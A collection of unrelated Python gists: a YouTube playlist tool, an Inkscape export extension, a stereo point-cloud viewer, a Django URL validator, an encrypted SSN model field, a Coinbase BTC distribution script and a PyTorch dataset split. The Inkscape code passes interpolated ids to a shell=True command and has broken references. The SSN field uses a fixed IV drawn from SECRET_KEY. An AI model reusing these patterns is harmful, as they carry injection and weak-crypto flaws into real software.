# This OAuth 2.0 access scope allows for full read/write access to the
# authenticated user's account.
YOUTUBE_SCOPE = "https://www.googleapis.com/auth/youtube"
YOUTUBE_API_SERVICE_NAME = "youtube"
YOUTUBE_API_VERSION = "v3"
def video_id(url):
"""
Examples:
- http://youtu.be/SA2iWivDJiE
- http://www.youtube.com/watch?v=_oPAwA_Udwc&feature=feedu
- http://www.youtube.com/embed/SA2iWivDJiE
- http://www.youtube.com/v/SA2iWivDJiE?version=3&hl=en_US
- www.youtube.com/embed/SA2iWivDJiE
- http://youtu.be.com/SA2iWivDJiE
- youtube.com/embed/SA2iWivDJiE
- SA2iWivDJiE
From http://stackoverflow.com/a/7936523
Edited to support optional url scheme and only video_id
"""
query = urlparse(url)
if not query.scheme:
url = "http://" + url
query = urlparse(url)
#http://stackoverflow.com/q/6344993
if query.hostname == 'youtu.be':
return query.path[1:]
if query.hostname in ('www.youtube.com', 'youtube.com'):
if query.path == '/watch':
p = parse_qs(query.query)
return p['v'][0]
if query.path[:7] == '/embed/':
return query.path.split('/')[2]
if query.path[:3] == '/v/':
return query.path.split('/')[2]
#match for a video_id as a argument
if re.match('[a-zA-Z0-9_-]{11}', url):
return url
return None
def get_authenticated_service():
flow = flow_from_clientsecrets(CLIENT_SECRETS_FILE, scope=YOUTUBE_SCOPE,
message=MISSING_CLIENT_SECRETS_MESSAGE)
storage = Storage("%s-oauth2.json" % sys.argv[0])
credentials = storage.get()
if credentials is None or credentials.invalid:
credentials = run(flow, storage)
return build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
http=credentials.authorize(httplib2.Http()))
def get_videos_from_playlist(youtube, items, playlistID):
response = items.list(part="snippet", playlistId=playlistID)
while response:
playlistitems_list_response = response.execute()
for playlist_item in playlistitems_list_response["items"]:
# title = playlist_item["snippet"]["title"]
video_id = playlist_item["snippet"]["resourceId"]["videoId"]
yield video_id
response = youtube.playlistItems().list_next(
response, playlistitems_list_response)
def add_video_to_playlist(youtube,playlistID, videoID):
items = youtube.playlistItems()
playlist = get_videos_from_playlist(youtube, items, playlistID)
if videoID not in playlist:
add_video_request=items.insert(
part="snippet",
body={
'snippet': {
'playlistId': playlistID,
'resourceId': {
'kind': 'youtube#video',
'videoId': videoID
}
#'position': 0
}
}
).execute()
return add_video_request
print "Already on Playlist"
return None
def add_file_to_playlist(youtube, playlistID, finput):
for line in finput:
videoID = video_id(line.strip())
try:
add_video_to_playlist(youtube, playlistID, videoID)
except Exception, e:
print "Couldn't add video: {0}\n{1}\n".format(videoID, e)
if __name__ == '__main__':
docs = \
"""Add to youtube playlist
Usage:
add2ytpl.py add <playlistID> <videoID>...
add2ytpl.py addFile <playlistID> [#...]
add2ytpl.py (-h | --help)
Options:
-h --help Show this screen.
"""
args = docopt(docs)
# print(args)
youtube = get_authenticated_service()
if args['add']:
for video in args['<videoID>']:
add_video_to_playlist(youtube, args['<playlistID>'], video_id(video))
if args['addFile']:
f = fileinput.input(args['#'])
add_file_to_playlist(youtube, args['<playlistID>'], f)
```
#### File: hard-gists/989074/snippet.py
```python
import inkex
import sys, os, commands,subprocess
import string
from xml.dom.minidom import Document
from xml.dom.minidom import DocumentType
# This line is only needed if you don't put the script directly into
# the installation directory
#sys.path.append('/usr/share/inkscape/extensions')
# The simplestyle module provides functions for style parsing.
from simplestyle import *
# Generic class to handle object meta data.
class imageMetaData():
id = ""
background = ""
width = ""
height = ""
path = ""
area = ""
x = 0
y = 0
# Effect main class
class ExportToAny(inkex.Effect):
parserProcessHandle = None
saveLocation = ""
where = ""
what = ""
svg_file = ""
renderHistory = []
def __init__(self):
"""
Constructor.
Defines the "--what" option of a script.
"""
# Call the base class constructor.
inkex.Effect.__init__(self)
# The OptionParser stuff below are Inkscape specific code which sets up the dialog for the extension GUI.
# The current options are just lab stuff and should be substituted with something more usefull.
# Define string option "--what" with "-w" shortcut.
self.OptionParser.add_option('-w', '--what', action = 'store',
type = 'string', dest = 'what', default = 'World',
help = '')
self.OptionParser.add_option('--where', action = 'store',
type = 'string', dest = 'where', default = 'c:\\',
help = 'Where to save?')
# exportImage takes as argument the current svg element id. This is then used to select which element the Inkscape exe should export.
def exportImage(self,id,parent_id):
# The easiest way to name rendered elements is by using their id since we can trust that this is always unique.
# The id will later be used as reference by the canvas document (html, ddh, css, ...)
filename = os.path.join(self.where, id+'.png')
# Inkscape has many really usefull cmd line arguments which can be used to query for data, and render bitmaps.
# Please not that Inkscape supports shell execution and should really be started as such at the beginning of parsing.
# The shell spawning stuff is commented out at the bottom of this script.
# The current command will start/close a new instance of the app for every element parsed.
command = "inkscape --without-gui --export-area-snap --export-id %s --export-png %s %s " % (id, filename, self.svg_file) #create the command that will be use to export
processHandle = subprocess.Popen(command,
shell=True,
stdout=subprocess.PIPE)
# Inkscape is gracious enough to return some metadata regarding the exported bitmap.
stdout_value = processHandle.communicate()[0]
# Inkscapes element metadata is not a pleasant format. parseImageMetaData data tries to remedy this.
imageMetaData = self.parseImageMetaData(
str(stdout_value)
)
return ((id + ";" + parent_id) + (";" + imageMetaData))
# exportImage takes as argument the current svg element id. This is then used to select which element the Inkscape exe should export.
def getImage(self,id,parent_id):
# Inkscape has many really useful cmd line arguments which can be used to query for data, and render bitmaps.
        # Please note that Inkscape supports shell execution and should really be started as such at the beginning of parsing.
# The shell spawning stuff is commented out at the bottom of this script.
# The current command will start/close a new instance of the app for every element parsed.
command = "inkscape --without-gui --export-area-snap --export-id %s --export-png %s %s " % (id, filename, self.svg_file) #create the command that will be use to export
processHandle = subprocess.Popen(command,
shell=True,
stdout=subprocess.PIPE)
# Inkscape is gracious enough to return some metadata regarding the exported bitmap.
stdout_value = processHandle.communicate()[0]
# Inkscapes element metadata is not a pleasant format. parseImageMetaData data tries to remedy this.
imageMetaData = self.parseImageMetaData(
str(stdout_value)
)
return ((id + ";" + parent_id) + (";" + imageMetaData))
def parseImageMetaData(self,metaDataString):
# Inkscape exports information about svg objects in a pretty ugly format. Lets do a quick and dirty solution to this problem :)
# NOTE: The input format of the metaDataString may very well change in future Inkscape releases.
if(metaDataString != ''):
metaDataString = metaDataString.replace('Background RRGGBBAA: ','')
metaDataString = metaDataString.replace('Area ',';')
metaDataString = metaDataString.replace(' exported to ',';')
metaDataString = metaDataString.replace('Bitmap saved as: ','')
metaDataString = metaDataString.replace(' x ',';')
metaDataString = metaDataString.replace(' pixels (90 dpi)',';')
metaDataString += ''
return metaDataString
# parseDoc is the first level of parsing.
def parseDoc(self):
# As you can see in the xpath query below we select all groups at the first level of the document.
layers = self.document.xpath('//svg:svg/svg:g',namespaces=inkex.NSS)
# For each group (which at this level is actually an Inkscape layer) call parseLayer.
for node in layers:
layerStr = self.exportImage(node.get('id'),'svg')
self.debugLogger(layerStr)
self.parseLayer(node)
def parseLayer(self,rootElement):
# I have chosen to call the level above layer "panel".
panels = rootElement.xpath('svg:g',namespaces=inkex.NSS)
# Hey ho here we go
for node in panels:
self.parsePanel(node)
def parsePanel(self,rootElement):
# A panel is an area of the layer which we want to define. This area will not be rendered as a bitmap but saved as model data to be used when
# rendering the canvas document (html, ddh, ...)
elements = rootElement.xpath('svg:g',namespaces=inkex.NSS)
#self.debugLogger(len(elements))
# Loop through all *grouped elements*, which will be rendered as png bitmaps. Ungrouped elements will be ignored.
for node in elements:
self.parseElement(node)
def parseElement(self,node):
element_metadata = ""
id = node.get('id')
# Do actual export
element_metadata = self.exportImage(id,'svg')
element_metadata = element_metadata.split(';')
element_metadata[3] = element_metadata[3].split(':')
# Assign the element_metadata values to an elementData struct which we later can query for element data. This will be used for rendering of content documents.
elementData = {
'id':element_metadata[0],
'parent_id':element_metadata[1],
'background': element_metadata[2],
'area':{
'x':element_metadata[3][0],
'y':element_metadata[3][1],
'rel_x':element_metadata[3][2],
'rel_y':element_metadata[3][3]
},
'width':element_metadata[4],
'height':element_metadata[5],
'path':element_metadata[6]
}
# Here we simply add the new struct to the renderHistory array.
self.renderHistory.append(elementData)
# And just for debug sake write some stuff back to the document.
#self.debugLogger(self.renderHistory[0]['id'])
# Sub-optimal function just as "proof-of-concept"
def renderDDHDoc(self):
bitmapSchemaString = ''
bitmapDBString = ''
ddhDocString = ''
iterator = 0
# Ok lets render the bitmap schema section of the ddh
bitmapSchemaString = '<BitmapSchema><SchemaId>1</SchemaId><DayMode><BitmapDirectory>%s</BitmapDirectory>'%(self.where)
for node in self.renderHistory:
bitmapSchemaString += '<Bitmap>\n<BitmapId>%s</BitmapId>\n<DefaultBitmapFileName>%s</DefaultBitmapFileName>\n</Bitmap>\n'%(node['id'],node['path'].replace('\n',''))
# Add the end tag
bitmapSchemaString += '</BitmapSchema>\n'
# --------------------------------------------------------------------------------------------------------------------------------
# Ok lets render the bitmap database section of the ddh
for node in self.renderHistory:
iterator = iterator + 1
bitmapDBString += '<Bitmap ddh:Name="%s">\n<BitmapId>%s</BitmapId>\n<BitmapRenderValue>FixedSize</BitmapRenderValue>\n</Bitmap>\n'%(iterator,node['id'])
ddhDocString = ('<BitmapDatabase ddh:NextIdForDatabase="">\n' + bitmapSchemaString + bitmapDBString + '</BitmapDatabase>')
# Let's create a file and write it to disk.
filename = os.path.join(self.where, "ddh_sections.xml")
# Create a file object:
# in "write" mode
FILE = open(filename,"w")
FILE.write(ddhDocString)
FILE.close()
#self.debugLogger(ddhDocString)
# Sub-optimal function just as "proof-of-concept"
def renderCSSDoc(self):
docString = ''
iterator = 0
# Ok lets render the bitmap schema section of the ddh
docString = '<style>\n'
topPos = 0
for node in self.renderHistory:
topPos = 1#(node['area']['y'] + node['height'])
docString += '.%s {position:relative;top:%spx;left:%spx;}\n'%(node['id'],topPos,node['area']['y'])
# Add the end tag
docString += '</style>\n'
# --------------------------------------------------------------------------------------------------------------------------------
# Let's create a file and write it to disk.
filename = os.path.join(self.where, "css.css")
# Create a file object:
# in "write" mode
FILE = open(filename,"w")
FILE.write(docString)
FILE.close()
#self.debugLogger(docString)
def effect(self):
"""
Effect behaviour.
Overrides base class method
"""
self.svg_file = self.args[-1]
# Get script's "--what" option value.
self.what = self.options.what
# Get script's "--where" option value.
self.where = self.options.where
# Get the handle for the parser process. In this case Inkscape is used.
#self.parserProcessHandle = self.getParserSession()
self.parseDoc()
self.renderCSSDoc()
#self.endParserSession()
def debugLogger(self,textStr):
debugLayer = self.document.xpath('//svg:svg/svg:g',namespaces=inkex.NSS)[0]
# Create text element
text = inkex.etree.Element(inkex.addNS('text','svg'))
text.text = str(textStr)
# Set text position to center of document.
text.set('x', str(300 / 2))
text.set('y', str(300 / 2))
# Center text horizontally with CSS style.
style = {'text-align' : 'center', 'text-anchor': 'middle'}
text.set('style', formatStyle(style))
# Connect elements together.
debugLayer.append(text)
# Create effect instance and apply it.
effect = ExportToAny()
effect.affect()
"""
def getParserSession(self):
command = "inkscape --shell"
processHandle = subprocess.Popen(command,
shell=True,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE)
return processHandle
def endParserSession(self):
command = "exit"
stdout_value = self.parserProcessHandle.communicate(command)
return repr(stdout_value)
"""
```
#### File: hard-gists/98b7edca1b29c949fcf1/snippet.py
```python
import argparse
import cv2
import numpy as np
def calc_disparity(left_image, right_image):
window_size = 3
min_disp = 1
num_disp = 16*2
stereo = cv2.StereoSGBM(
minDisparity=min_disp,
numDisparities=num_disp,
SADWindowSize=window_size,
uniquenessRatio=10,
speckleWindowSize=100,
speckleRange=32,
disp12MaxDiff=1,
P1=8*3*window_size**2,
P2=32*3*window_size**2,
fullDP=False
)
return stereo.compute(left_image, right_image).astype(np.float32) / 16.0
def remove_invalid(disp_arr, points, colors):
mask = (
(disp_arr > disp_arr.min()) &
np.all(~np.isnan(points), axis=1) &
np.all(~np.isinf(points), axis=1)
)
return points[mask], colors[mask]
def calc_point_cloud(image, disp, q):
points = cv2.reprojectImageTo3D(disp, q).reshape(-1, 3)
colors = image.reshape(-1, 3)
return remove_invalid(disp.reshape(-1), points, colors)
def project_points(points, colors, r, t, k, dist_coeff, width, height):
projected, _ = cv2.projectPoints(points, r, t, k, dist_coeff)
xy = projected.reshape(-1, 2).astype(np.int)
mask = (
(0 <= xy[:, 0]) & (xy[:, 0] < width) &
(0 <= xy[:, 1]) & (xy[:, 1] < height)
)
return xy[mask], colors[mask]
def calc_projected_image(points, colors, r, t, k, dist_coeff, width, height):
xy, cm = project_points(points, colors, r, t, k, dist_coeff, width, height)
image = np.zeros((height, width, 3), dtype=colors.dtype)
image[xy[:, 1], xy[:, 0]] = cm
return image
def rotate(arr, anglex, anglez):
return np.array([ # rx
[1, 0, 0],
[0, np.cos(anglex), -np.sin(anglex)],
[0, np.sin(anglex), np.cos(anglex)]
]).dot(np.array([ # rz
[np.cos(anglez), 0, np.sin(anglez)],
[0, 1, 0],
[-np.sin(anglez), 0, np.cos(anglez)]
])).dot(arr)
def run(left_image, right_image, focal_length, tx):
image = right_image
height, width, _ = image.shape
disp = calc_disparity(left_image, right_image)
q = np.array([
[1, 0, 0, -width/2],
[0, 1, 0, -height/2],
[0, 0, 0, focal_length],
[0, 0, -1/tx, 0]
])
points, colors = calc_point_cloud(image, disp, q)
r = np.eye(3)
t = np.array([0, 0, -100.0])
k = np.array([
[focal_length, 0, width/2],
[0, focal_length, height/2],
[0, 0, 1]
])
dist_coeff = np.zeros((4, 1))
def view(r, t):
cv2.imshow('projected', calc_projected_image(
points, colors, r, t, k, dist_coeff, width, height
))
view(r, t)
angles = { # x, z
'w': (-np.pi/6, 0),
's': (np.pi/6, 0),
'a': (0, np.pi/6),
'd': (0, -np.pi/6)
}
while 1:
key = cv2.waitKey(0)
if key not in range(256):
continue
ch = chr(key)
if ch in angles:
ax, az = angles[ch]
r = rotate(r, -ax, -az)
t = rotate(t, ax, az)
view(r, t)
elif ch == '\x1b': # esc
cv2.destroyAllWindows()
break
def main():
parser = argparse.ArgumentParser()
parser.add_argument('left_image')
parser.add_argument('right_image')
parser.add_argument('focal_length', type=float)
parser.add_argument('distance_between_cameras', type=float)
args = parser.parse_args()
left_image = cv2.imread(args.left_image)
right_image = cv2.imread(args.right_image)
f = args.focal_length
tx = args.distance_between_cameras
run(left_image, right_image, f, tx)
if __name__ == '__main__':
main()
```
#### File: hard-gists/9952389/snippet.py
```python
import os
import sae
import web
import json
import urllib2
urls=('/','Index','/xiami/(.+)','Xiami')
class Index:
def GET(self):
web.redirect('http://miantiao.me')
class Xiami:
def GET(self,id):
id=str(id.replace('.mp3',''))
request = urllib2.Request(''.join(['http://www.xiami.com/app/iphone/song/id/',id]))
request.add_header('User-Agent', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X; en-us) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53')
request.add_header('Referer', ''.join(['http://www.xiami.com/app/iphone/song/id/',id]))
response = urllib2.urlopen(request)
info=json.loads(response.read())
url=info['location']
web.seeother(url)
app = web.application(urls, globals()).wsgifunc()
application = sae.create_wsgi_app(app)
```
#### File: hard-gists/998722/snippet.py
```python
import platform
import re
import urllib2
import urlparse
from django.core.exceptions import ValidationError
from django.core.validators import RegexValidator
from django.core.urlresolvers import resolve
from django.http import Http404
from django.utils.translation import ugettext_lazy as _
from django.utils.encoding import smart_unicode
try:
from django.conf import settings
URL_VALIDATOR_USER_AGENT = settings.URL_VALIDATOR_USER_AGENT
except ImportError:
# It's OK if Django settings aren't configured.
URL_VALIDATOR_USER_AGENT = 'Django (http://www.djangoproject.com/)'
class RelativeURLValidator(RegexValidator):
""" Validator which allows for relative URL's as well. """
regex = re.compile(
r'^((?:http|ftp)s?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain...
r'localhost|' #localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE) # host is optional, allow for relative URLs
def __init__(self, verify_exists=False, validator_user_agent=URL_VALIDATOR_USER_AGENT):
super(RelativeURLValidator, self).__init__()
self.verify_exists = verify_exists
self.user_agent = validator_user_agent
def __call__(self, value):
try:
super(RelativeURLValidator, self).__call__(value)
except ValidationError, e:
# Trivial case failed. Try for possible IDN domain
if value:
value = smart_unicode(value)
scheme, netloc, path, query, fragment = urlparse.urlsplit(value)
try:
netloc = netloc.encode('idna') # IDN -> ACE
except UnicodeError: # invalid domain part
raise e
url = urlparse.urlunsplit((scheme, netloc, path, query, fragment))
super(RelativeURLValidator, self).__call__(url)
else:
raise
else:
url = value
if self.verify_exists:
broken_error = ValidationError(
_(u'This URL appears to be a broken link.'), code='invalid_link')
if url.startswith('http://') or url.startswith('ftp://'):
headers = {
"Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Connection": "close",
"User-Agent": self.user_agent,
}
url = url.encode('utf-8')
try:
req = urllib2.Request(url, None, headers)
req.get_method = lambda: 'HEAD'
#Create an opener that does not support local file access
opener = urllib2.OpenerDirector()
#Don't follow redirects, but don't treat them as errors either
error_nop = lambda *args, **kwargs: True
http_error_processor = urllib2.HTTPErrorProcessor()
http_error_processor.http_error_301 = error_nop
http_error_processor.http_error_302 = error_nop
http_error_processor.http_error_307 = error_nop
handlers = [urllib2.UnknownHandler(),
urllib2.HTTPHandler(),
urllib2.HTTPDefaultErrorHandler(),
urllib2.FTPHandler(),
http_error_processor]
try:
import ssl
handlers.append(urllib2.HTTPSHandler())
except:
#Python isn't compiled with SSL support
pass
map(opener.add_handler, handlers)
if platform.python_version_tuple() >= (2, 6):
opener.open(req, timeout=10)
else:
opener.open(req)
except ValueError:
raise ValidationError(_(u'Enter a valid URL.'), code='invalid')
except: # urllib2.URLError, httplib.InvalidURL, etc.
raise broken_error
else:
# Resolve the relative URL
try:
resolve(url)
except Http404:
raise broken_error
```
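The validator accepts both absolute and site-relative URLs, and with `verify_exists=True` it either issues a HEAD request (absolute URLs) or runs the path through Django's `resolve()` (relative URLs). A small sketch of attaching it to a model field; the `LandingPage` model and its field names are made up for illustration and target the same old Django/urllib2 era as the snippet:
```python
# Hypothetical model: `target` may be "https://example.com/docs/" or "/docs/".
from django.db import models

class LandingPage(models.Model):
    title = models.CharField(max_length=100)
    target = models.CharField(
        max_length=200,
        validators=[RelativeURLValidator(verify_exists=False)],
    )
```
The validator runs whenever `full_clean()` is called, for example from a `ModelForm`.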
#### File: hard-gists/999228/snippet.py
```python
from Crypto.Cipher import AES
import binascii
import re

from django.conf import settings
from django.db import models
from django.utils.translation import ugettext_lazy as _

ssn_re = re.compile(r"^\d{3}[-\ ]?\d{2}[-\ ]?\d{4}$")
class EncryptedSSNField(models.CharField):
description = _('Adds transparent encryption/decryption (AES256 using pyCrypto) for US Social Security Numbers in the database.')
__metaclass__ = models.SubfieldBase
def __init__(self, *args, **kwargs):
kwargs['max_length'] = 64
super(EncryptedSSNField, self).__init__(*args, **kwargs)
def to_python(self, value):
        if value in (u'', '', None):
return unicode(value)
else:
encobj1 = AES.new(settings.SECRET_KEY[:32], AES.MODE_CBC, settings.SECRET_KEY[34:50])
encobj2 = AES.new(settings.SECRET_KEY[:32], AES.MODE_CBC, settings.SECRET_KEY[34:50])
dec1 = encobj1.decrypt(binascii.a2b_hex(value))
dec2 = encobj2.decrypt(binascii.a2b_hex(dec1))
return unicode(dec2.rstrip())
def get_prep_value(self, value):
encobj1 = AES.new(settings.SECRET_KEY[:32], AES.MODE_CBC, settings.SECRET_KEY[34:50])
encobj2 = AES.new(settings.SECRET_KEY[:32], AES.MODE_CBC, settings.SECRET_KEY[34:50])
match = re.match(ssn_re, value)
block_bytes = 16
while len(value) < block_bytes:
value += ' '
if match:
enc1 = binascii.b2a_hex(encobj1.encrypt(value))
enc2 = binascii.b2a_hex(encobj2.encrypt(enc1))
return unicode(enc2)
else:
raise ValueError(_('Please enter a valid U.S. Social Security Number.'))
def get_prep_lookup(self, lookup_type, value):
if lookup_type == 'exact':
return self.get_prep_value(value)
elif lookup_type == 'isnull':
return value
else:
raise TypeError('Lookup type %r not supported.' % lookup_type)
```
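A small usage sketch, assuming a Django project whose `SECRET_KEY` is at least 50 characters long (the field slices it for the AES key and IV); the `Employee` model is invented for illustration:
```python
# Hypothetical model using the field; the SSN is stored hex-encoded and
# decrypted transparently on read. Because the IV is fixed, encryption is
# deterministic, which is what makes the 'exact' lookup below work.
class Employee(models.Model):
    name = models.CharField(max_length=100)
    ssn = EncryptedSSNField()

# Employee.objects.create(name="Jane Doe", ssn="123-45-6789")
# Employee.objects.get(ssn="123-45-6789")
```
Note that the deterministic encryption that enables exact lookups also means identical SSNs produce identical ciphertexts.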
#### File: hard-gists/9ad6a265aac887fa26c1/snippet.py
```python
COINBASE_API_KEY = "YOUR-API-KEY"
COINBASE_API_SECRET = "YOUR-API-SECRET"
from coinbase_passwords import *
import websocket
import json
import logging
import thread
import time
import datetime
# for coinbase stuff
import urllib2
import hashlib
import hmac
# The index number of the next address to use in the deterministic wallet. So,
# if the program just crashed for whatever reason, you would look at the last
# index used to send some BTC, and write that number plus one here.
address_indexer = 38
# Amount BTC to distribute per address. A better system would use a random
# number within some range.
per_address = 0.01
# Number of transactions per block to create. There is no guarantee that each
# transaction will be included in each block. Some might appear in future
# blocks, so the transaction count might be anywhere between 0 and the the
# total number of transactions that have been attempted but not yet included in
# a block. This number controls the creation of new transactions per block. A
# better system might monitor for unconfirmed transactions, and only create new
# transactions once the previous transactions have been confirmed at least
# once so that the total balance doesn't end up tied up in lousy unconfirmed
# transactions. A better system would use a random number within some range
# (including zero in that range).
transactions_per_block = 4
# Also, there is a minor incentive to keep the number of transactions per block
# low. In particular, and especially if you choose a high-entropy number for
# the value of "per_address", it will be easy for others to guess that the
# other addresses belong to you because the same account balances are being
# transferred. Similarly, a large increase in the number of small-value
# transactions in the blockchain in a given block is another piece of
# information that can be used to correlate the addresses as probably belonging
# to the same owner. For these reasons and others, splitting up the
# transactions into separate blocks helps to obfuscate your presence at least a
# little.
max_transactions = 1000
# sudo apt-get install electrum
# https://bitcointalk.org/index.php?topic=612143.0
import electrum
# load default electrum configuration
config = electrum.SimpleConfig()
storage = electrum.wallet.WalletStorage(config)
wallet = electrum.wallet.Wallet(storage)
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(message)s')
log = logging.getLogger(__name__)
def get_total_balance(wallet=wallet):
"""
:return: total balance in satoshis (confirmed)
"""
#return wallet.get_account_balance(0)[0]
return wallet.get_balance()[0]
def get_address_balance(address, wallet=wallet):
"""
:param address: some address
:return: confirmed address balance in satoshis
"""
return wallet.get_addr_balance(address)[0]
def get_nth_address(number, wallet=wallet):
"""
Generate the nth address. Doesn't generate change addresses.
:param number: the numberth public address to generate
:return: address
"""
return wallet.accounts[0].get_address(0, number)
def get_first_address_with_zero_balance(wallet=wallet, minimum=0, limit=10000):
"""
Find an address that has a balance of zero. Ideally this would find an
address that hasn't been used before, because it is possible that it will
find an address that has been previously used and emptied back to zero.
A better system would check the blockchain and find the first unused
address, and then rename this function appropriately.
:param limit: Number of search cycles to employ after exhausting
pre-generated list of addresses.
:param minimum: first usable address (skip everything before) (useful for
resuming)
:return: (number, address)
"""
for (number, address) in enumerate(wallet.addresses()):
balance = get_address_balance(address, wallet=wallet)
if balance == 0 and number >= minimum:
return (number, address)
else:
# Exhausted pre-generated addresses. Search for next address that has
# zero balance.
counter = number
while counter <= limit:
address = get_nth_address(counter, wallet=wallet)
balance = get_address_balance(address, wallet=wallet)
if balance == 0 and counter >= minimum:
return (counter, address)
counter += 1
# Really I shouldn't use a limit, but I'm skeptical that 10,000
# addresses are really in use. Human intervention required..
raise Exception("Couldn't find an address with an empty balance.")
def execute_coinbase_http(url, body=None):
"""
https://coinbase.com/docs/api/authentication
"""
# just a precaution..
if "https" not in url:
raise Exception("i don't think so, tim")
opener = urllib2.build_opener()
nonce = int(time.time() * 1e6)
message = str(nonce) + url + ('' if body is None else body)
signature = hmac.new(COINBASE_API_SECRET, message, hashlib.sha256).hexdigest()
opener.addheaders = [('ACCESS_KEY', COINBASE_API_KEY),
('ACCESS_SIGNATURE', signature),
('ACCESS_NONCE', nonce)]
try:
return opener.open(urllib2.Request(url, body, {'Content-Type': 'application/json'}))
except urllib2.HTTPError as e:
print e
return e
def send_btc(amount, address):
"""
Use coinbase.com to send some BTC to an address. The amount is in units of
BTC. When the transaction is successfully created, coinbase.com will return
some json with the "success" key set to json true.
"""
# Don't debug with httpbin while the headers are enabled in
# execute_coinbase_http.
#url = "http://httpbin.org/post"
url = "https://coinbase.com/api/v1/transactions/send_money"
body = json.dumps({
"transaction": {
"to": address,
"amount": amount,
},
})
response = execute_coinbase_http(url, body=body)
content = json.loads(response.read())
return content
class BlockchainInfoWebSocketAPI(object):
"""
http://blockchain.info/api/api_websocket
"""
url = "ws://ws.blockchain.info/inv"
@staticmethod
def on_open(ws):
"""
Spawn a function that pings blockchain.info every 30 seconds so that
the websocket connection doesn't get killed from that end.
"""
def run(*args):
# subscribe to blocks
BlockchainInfoWebSocketAPI.subscribe_to_blocks(ws)
# ping every 25 seconds to prevent remote server from disconnecting
while 1:
log.debug("BlockchainInfoWebSocketAPI: doing heartbeat ping to blockchain.info")
ws.send("")
time.sleep(25)
# run the "run" method in a new thread
thread.start_new_thread(run, ())
@staticmethod
def on_close(ws):
log.info("BlockchainInfoWebSocketAPI: closing websocket connection")
@staticmethod
def on_error(ws, error):
log.exception("BlockchainInfoWebSocketAPI error: " + error)
@staticmethod
def on_message(ws, message):
global transactions_per_block
global per_address
global address_indexer
data = json.loads(message)
if data["op"] == "block":
log.info("BlockchainInfoWebSocketAPI: received new block")
i = 0
while i < transactions_per_block:
amount = per_address
(latest_index, address) = get_first_address_with_zero_balance(minimum=address_indexer)
log.info("BlockchainInfoWebSocketAPI: sending {amount} BTC to address #{num} - {address}".format(
amount=amount,
num=latest_index,
address=address,
))
response = send_btc(str(amount), address)
log.info("BlockchainInfoWebSocketAPI: coinbase.com request successful? " + str(response["success"]))
log.info(response)
# Kinda lying, it's really just an indexer, so point it to the
# next one please.
address_indexer = latest_index + 1
i += 1
@staticmethod
def subscribe_to_blocks(ws):
"""
Communicates with blockchain.info to subscribe to block notifications.
Use blocks_sub for blocks. The ping_block operation is used only for
debugging (it immediately pings the last known block).
"""
ws.send('{"op":"blocks_sub"}')
# ws.send('{"op":"ping_block"}')
@staticmethod
def _run_forever():
log.info("BlockchainInfoWebSocketAPI: begin blockchain.info websocket connection")
ws = websocket.WebSocketApp(
BlockchainInfoWebSocketAPI.url,
on_message=BlockchainInfoWebSocketAPI.on_message,
on_error=BlockchainInfoWebSocketAPI.on_error,
on_close=BlockchainInfoWebSocketAPI.on_close,
on_open=BlockchainInfoWebSocketAPI.on_open,
)
ws.run_forever()
return ws
@staticmethod
def run_forever():
delay = 1
while 1:
# try to use run_forever, wait between with an exponential backoff
try:
BlockchainInfoWebSocketAPI._run_forever()
except websocket.WebSocketException, exc:
log.exception(exc)
log.warning("BlockchainInfoWebSocketAPI: will attempt to restart connection in {0} seconds...".format(delay))
time.sleep(delay)
delay *= 2
except Exception, exc:
raise exc
def quick_time_estimate(per_address, transactions_per_block, max_transactions):
"""
Estimate the total BTC to distribute, how many blocks to use, how many
hours this will probably take (assuming 10 minutes per block), and an
estimated timestamp for when everything will be done.
"""
total_btc = per_address * max_transactions
# Number of required blocks is based on the total number of transactions.
blocks = float(max_transactions) / float(transactions_per_block)
# each block takes 10 minutes (uh, on average, or rather, that's the target)
minutes = blocks * 10
# each hour takes 60 minutes
hours = minutes / 60
timefuture = datetime.datetime.now() + datetime.timedelta(minutes=minutes)
return (total_btc, blocks, hours, timefuture)
def dump_estimates(
per_address=per_address,
transactions_per_block=transactions_per_block,
max_transactions=max_transactions,
):
(total_btc, blocks, hours, timefuture) = quick_time_estimate(per_address, transactions_per_block, max_transactions)
output = "total_btc: {total_btc}\n"
output += "blocks: {blocks}\n"
output += "hours: {hours}\n"
output += "approximately done at: {timefuture}"
output = output.format(
total_btc=total_btc,
blocks=blocks,
hours=hours,
timefuture=timefuture,
)
return output
if __name__ == "__main__":
print dump_estimates(), "\n"
BlockchainInfoWebSocketAPI.run_forever()
```
#### File: hard-gists/9f6118ff84867e89f3348707c7a1271f/snippet.py
```python
import os

import torch.utils.data
from torchvision import datasets, transforms
class PartialDataset(torch.utils.data.Dataset):
def __init__(self, parent_ds, offset, length):
self.parent_ds = parent_ds
self.offset = offset
self.length = length
assert len(parent_ds)>=offset+length, Exception("Parent Dataset not long enough")
super(PartialDataset, self).__init__()
def __len__(self):
return self.length
def __getitem__(self, i):
return self.parent_ds[i+self.offset]
def validation_split(dataset, val_share=0.1):
"""
Split a (training and vaidation combined) dataset into training and validation.
Note that to be statistically sound, the items in the dataset should be statistically
independent (e.g. not sorted by class, not several instances of the same dataset that
could end up in either set).
inputs:
dataset: ("training") dataset to split into training and validation
val_share: fraction of validation data (should be 0<val_share<1, default: 0.1)
returns: input dataset split into test_ds, val_ds
"""
val_offset = int(len(dataset)*(1-val_share))
return PartialDataset(dataset, 0, val_offset), PartialDataset(dataset, val_offset, len(dataset)-val_offset)
mnist_train_ds = datasets.MNIST(os.path.expanduser('~/data/datasets/mnist'), train=True, download=True,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
]))
train_ds, val_ds = validation_split(mnist_train_ds)
kwargs = {}  # e.g. dict(num_workers=1, pin_memory=True) when loading on CUDA
